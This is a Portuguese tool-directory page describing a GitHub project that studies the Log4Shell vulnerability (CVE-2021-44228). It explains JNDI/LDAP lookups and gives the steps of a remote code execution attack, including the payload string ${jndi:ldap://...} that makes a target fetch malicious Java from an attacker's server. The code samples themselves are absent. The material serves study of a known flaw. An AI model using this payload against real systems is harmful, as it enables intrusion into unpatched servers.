Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2021-44228 — Estudo da vulnerabilidade CVE-2021-44228 | Kitploit
Ferramentas/GitHubGitHub/asd58584388/cve-2021-44228
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebAprendizado e EducaçãoFerramenta de Acesso RemotoDesenvolvimento de Payloads
GitHubasd58584388/cve-2021-44228

CVE-2021-44228

Estudo da vulnerabilidade CVE-2021-44228

Ver Repositório
1há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Análise do CVE-2021-44228

Como funciona?

Abaixo está um processo detalhado de um caso de injeção remota explorando a vulnerabilidade log4shell. Primeiro, há 3 partes que precisamos conhecer:

  1. O Log4j2 permite o registro de dados usando um recurso chamado substituição de lookup de mensagem, onde as mensagens de log podem incluir dados obtidos dinamicamente de várias fontes. (Ele suporta JNDI Lookup)

  2. JNDI Lookup: permite que dados sejam obtidos por meio da API Java Naming and Directory Interface (JNDI), que pode interagir com diferentes serviços de diretório

  3. LDAP (Lightweight Directory Access Protocol): usado principalmente para acessar e gerenciar serviços de informação de diretório em uma rede.


Aqui está um exemplo simples de Execução Remota de Código:

  1. O hacker configura tanto um servidor LDAP (acessado pelo protocolo LDAP, mantendo uma referência ao código malicioso Java) quanto um servidor HTTP (o local que armazena o código malicioso)

    1. Configure um servidor HTTP no diretório que contenha o código malicioso compilado:

    2. Configure um servidor LDAP que armazene a referência:

      ldap

  2. O hacker envia uma entrada maliciosa (${jndi:ldap://LDAPSERVER IP:PORT/code}) para o sistema de software que possui o log4j2 instalado

  3. O Log4j2 usa o recurso de lookup para enviar a solicitação ao servidor LDAP

  4. O servidor LDAP redireciona as solicitações para servidores HTTP por meio das referências de código Java armazenadas nos servidores LDAP

  5. O servidor HTTP envia o código malicioso de volta ao sistema de software, e então o sistema de software executa o código malicioso.

Código malicioso:

Execução do código malicioso bem-sucedida:


IMPORTANTE:

  1. Não é apenas possível usar o servidor LDAP para realizar execução remota de código; também podemos usar outros métodos (como RMI), desde que o log4j2 realize com sucesso a substituição de lookup de mensagem e execute o código malicioso

  2. Versões diferentes do Java podem tornar o processo de exploração diferente (aqui estamos usando o java 1.8u112).

  3. Recomenda-se usar a mesma versão do Java no código malicioso que a do software (servidores usando log4j2) ou, no máximo, uma versão não superior à versão do Java do software.

  4. O código de lookup no Log4j2:

Baixar ferramenta